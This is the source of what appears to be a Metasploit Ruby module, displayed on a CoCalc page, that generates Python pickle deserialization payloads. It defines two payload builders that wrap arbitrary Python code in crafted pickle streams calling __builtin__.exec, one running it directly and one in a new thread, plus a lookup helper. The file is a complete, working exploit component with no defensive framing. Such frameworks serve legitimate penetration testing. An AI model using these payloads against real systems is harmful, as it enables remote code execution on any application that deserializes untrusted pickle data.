CoCalc provides the best real-time collaborative environment for Jupyter Notebooks, LaTeX documents, and SageMath, scalable from individual users to large groups and classes!

1
# -*- coding: binary -*-
2

3
# Python deserialization Utility
4
module Msf
5
  module Util
6
    # Python deserialization class
7
    class PythonDeserialization
8
      # That could be in the future a list of payloads used to exploit the Python deserialization vulnerability.
9
      # Payload source files are available in external/source/python_deserialization
10
      PAYLOADS = {
11
        # this payload will work with Python 3.x targets to execute Python code in place
12
        py3_exec: proc do |python_code|
13
          escaped = python_code.gsub(/[\\\n\r]/) { |t| "\\u00#{t.ord.to_s(16).rjust(2, '0')}" }
14
          %|c__builtin__\nexec\np0\n(V#{escaped}\np1\ntp2\nRp3\n.|
15
        end,
16
        # this payload will work with Python 3.x targets to execute Python code in a new thread
17
        py3_exec_threaded: proc do |python_code|
18
          escaped = python_code.gsub(/[\\\n\r]/) { |t| "\\u00#{t.ord.to_s(16).rjust(2, '0')}" }
19
          %|c__builtin__\ngetattr\np0\n(cthreading\nThread\np1\nVstart\np2\ntp3\nRp4\n(g1\n(Nc__builtin__\nexec\np5\nN(V#{escaped}\np6\ntp7\ntp8\nRp9\ntp10\nRp11\n.|
20
        end
21
      }
22

23
      def self.payload(payload_name, command = nil)
24

25
        raise ArgumentError, "#{payload_name} payload not found in payloads" unless payload_names.include? payload_name.to_sym
26

27
        PAYLOADS[payload_name.to_sym].call(command)
28
      end
29

30
      def self.payload_names
31
        PAYLOADS.keys
32
      end
33

34
    end
35
  end
36
end
37

38